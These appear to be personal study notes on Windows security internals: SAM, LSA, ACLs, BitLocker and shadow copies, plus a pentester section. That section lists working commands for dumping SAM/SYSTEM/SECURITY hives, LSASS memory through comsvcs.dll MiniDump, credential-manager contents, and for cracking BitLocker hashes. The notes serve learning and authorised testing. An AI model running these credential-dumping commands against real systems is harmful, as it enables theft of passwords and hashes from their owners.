Windows Security


Windows has built-in tools and features to increase the security and reduce the attack surface exploitable for hackers.

Formerly known as Windows Defender, Windows Security provides features to help ensure the safety and privacy of the system.

  • πŸͺ² Antivirus
  • πŸ’° Ransomware protection
  • πŸ”« Network Firewall
  • πŸ”’ SmartScreen
  • ...

It's important to keep the operating system up to date. Windows Update is responsible for downloading and installing them.

Updates are usually released on the 2nd Tuesday of each month, which is often called "Patch Tuesday."

You can open Windows Update from a terminal using: control /name Microsoft.WindowsUpdate.

Microsoft frequently releases security updates for their products.

Authentication & Authorization

Security Accounts Manager (SAM)

windowsfundamentals password_attacks windowsfundamentals3xzx

The SAM (Security Accounts Manager) database is a local database present on every Windows computer. It is used for authentication. It stores account information including usernames and password hashes.

Modern versions of Windows use the NT hash format, commonly referred to as NTLM, as the previous format was LM.

The database is stored in: /Windows/System32/config/SAM/ (admin-only).

πŸ“š The SAM database is mounted in the registry at hklm/sam.

⚠️ The SAM database is often partially encrypted using SYSKEY.

SYSKEY, Bootkey, and System Hive


SYSKEY is a security feature that partially encrypts the SAM database with a key to protect against offline cracking.

  • SYSKEY define the configuration of the bootkey
  • The bootkey is the key used to encrypt the SAM database
  • The system hive contains the bootkey.

πŸ“š The system hive is stored in: /Windows/System32/config/System/ (admin-only) and mounted in the registry at hklm/system.

Security Hive


The security hive is used to store security configuration, but it's also used to store cached domain-joined credentials.

πŸ“š It is mounted in the registry at hklm/security.

Security Identifier (SID)


Each object (user, service, etc.) that can be authenticated is called "Security Principal," and has a security identifier (SID). They are used to verify that the user is authorized to an action.

A SID is a concatenation of a domain identifier and a relative identifier (RID). They start with S-. The last hyphen-separated value is the RID.

PS> whoami /user
PS> wmic useraccount get name,sid

Access Control

windowsfundamentals windowsfundamentals3xzx

The access to any resources is managed by Access Control Entries (ACEs) in Access Control Lists (ACLs). An ACL is a set of ACEs.

Each ACE specifies the permissions (R, W, X, etc.) granted or denied for a particular user or group (a SID) over a "securable object". A securable object refers to a resource that can be secured (files, services, etc.).

A security descriptor is a data structure associated with a securable object. It contains information such as:

  • Discretionary Access Control List (DACL): A list of ACEs
  • System Access Control List (SACL): Optionally, a list that specifies which security events should be audited.

Local Security Authority (LSA)

windowsfundamentals password_attacks windowsfundamentals3xzx

The Local Security Authority (LSA) is a process responsible for security-related functions in the operating system.

  • Authenticating users
  • Enforcing security policies
  • Generating access tokens (contains security information such as privileges, used by processes/... to authorize users)

It's managed by lsass.exe, the Local Security Authority Subsystem Service (LSASS).

BitLocker Encrypted Drive


BitLocker is a full disk encryption feature on Windows. We must unlock the drive at boot in order to read its contents.

  • 🌱 USB key
  • 😎 Pin or Password
  • 🍷 Trusted Platform Module (TPM)
  • ⚠️ Network Unlock

A recovery key can alternatively be used. It's a randomly generated 48-digit string of numbers. It can be saved on Active Directory, on your Microsoft Account, on an external drive, etc.

Bitlocker needs the drive to have two partitions. The first partition has the necessary files to start the system, while the other has the full operating system and our files.

Assuming you mounted the locked partition in /dev/xxxp2:

$ # unlock and map in /dev/mapper/mytag
$ sudo cryptsetup bitlkOpen /dev/xxxp2 mytag
$ sudo cryptsetup bitlkClose mytag

You can extract the user password ($0/$1) or the recovery key ($2/$3). You can then try hash cracking or bitcracker (0.7k ⭐, 2021 πŸͺ¦).

$ #
$ bitlocker2john -i xxx.vhd > myhashes
$ grep "bitlocker\$0" myhashes > myhash
$ hashcat -m 22100 myhash wordlist

Windows Pentester Notes ☠️

Dump Credentials From The SAM Database


If you have enough privileges to access the registry (not necessarily admin, but not a normal user), you can dump the three hives:

PS> reg save hklm\system C:\XXX\system.hive
PS> reg save hklm\sam C:\XXX\sam.hive
PS> reg save hklm\security C:\XXX\security.hive
$ nxc smb IP --local-auth -u xxx -p yyy --sam # remote dump

Use file transfer methods such as SMB and secretsdump to dump them. We would then try to crack or pass the hash.

$ impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL

Dump Credentials From The Credential Manager


Windows has a feature called credential manager used by apps to store credentials. Each user has one usually stored in %appdata%\Local\Microsoft\Credentials\.

It can be accessed from the GUI, or using the command line:

PS> vaultcmd /list
PS> vaultcmd /listcreds:"Web Credentials" /all
PS> vaultcmd /listcreds:"Windows Credentials" /all

Dump Credentials From LSASS process


The LSASS process that contains the credential manager masterkey for the logged user. It can be used to decrypt credentials for applications that use it. It also contains tickets, and wDIGEST cleartext credentials.

Dump using Mimikatz

Refer to the Mimikatz notes for usage. See also: pass-the-xxx.

Dump and analyze it on Linux with pypykatz

  • Dump LSA Process Memory (Admin Shell Required/No Admin for TM?)
$ tasklist /svc | findstr "lsa"
lsass.exe          4242
$ Get-Process lsass | Select Id
$ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4242 C:\lsass.dmp full
<detected by antivirus>
$ nxc smb IP --local-auth -u xxx -p yyy --lsa # remote dump

Lastly, you can also open the task manager, right-click on the LSAP process and select 'Create dump file.'

  • Analyzing LSA Process Dump on Linux using pypykatz (2.6k ⭐)
$ pypykatz lsa minidump lsass.dmp

Random Notes

Alternate Data Streams (ADS)


On NTFS filesystem, ADS allows files to have more than one stream of data. By default, every file has one stream called :$DATA.

PS> Get-Item -Path SomeFile -Stream * # list streams
PSPath        : Microsoft.PowerShell.Core\FileSystem::XXX\toto.pdf::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::XXX
PSChildName   : toto.pdf::$DATA
PSDrive       : XXX
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : XXX\toto.pdf
Stream        : :$DATA
Length        : 0

They can be used by Windows to store data, such as identifiers telling Windows that this file was downloaded from the Internet.

Hackers can use that to store malicious code inside a file. This code may be executed by a vulnerable application loading the file.

PS> $(Resolve-Path .\file.exe:stream) # vulnerable PS call

Volume Shadow Copy Service (VSS)

password_attacks adventofcyber2

The Volume Shadow Copy Service (VSS) is handling the creation, and management of shadow copies/snapshots of the data backed up.

It stores data in the "volume information" of each drive that has the feature enabled. They may allow a system admin to restore the system after an attack. Hackers will most likely check them and delete them.

To manage them, right-click on a hard-drive, and select "Shadow copies." Shadow copies can be stored externally.

➑️ See also: Volume Shadow Copy Service.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

windowsfundamentals2x0x windowsfundamentals3xzx

  • lusrmgr.msc: can be used to find entrypoints (weak passwords, groups with too many perms)
  • msconfig (find malware?)/winver (outdated?)/control system (open ports...)/msinfo32 (outdated?)/compmgmt (scheduled tasks...)/regedit (misconfiguration...): info can help in find vulnerabilities
  • UserAccountControlSettings: identify weakness
  • PowerSploit...
  • Mimikatz...
  • Microsoft Security Compliance Toolkit (SCT)
  • Microsoft Defender Application Control
  • device guard
  • applocker
  • Hiren's bootcd
  • SASE
  • sysmon
  • Introduction to Alternate Data Streams
  • Windows credential guard
  • LAPS
  • Windows Tilde Filenames (Refer to IIS)
  • Windows Defender Firewall
    • Block access to share if not in the same workgroup?
  • Application Whitelisting
  • AppLocker
  • Local Group Policy (gpedit.msc)
PS> # list enable protection settings
PS> Get-MpComputerStatus
PS> Get-MpComputerStatus | findstr "True"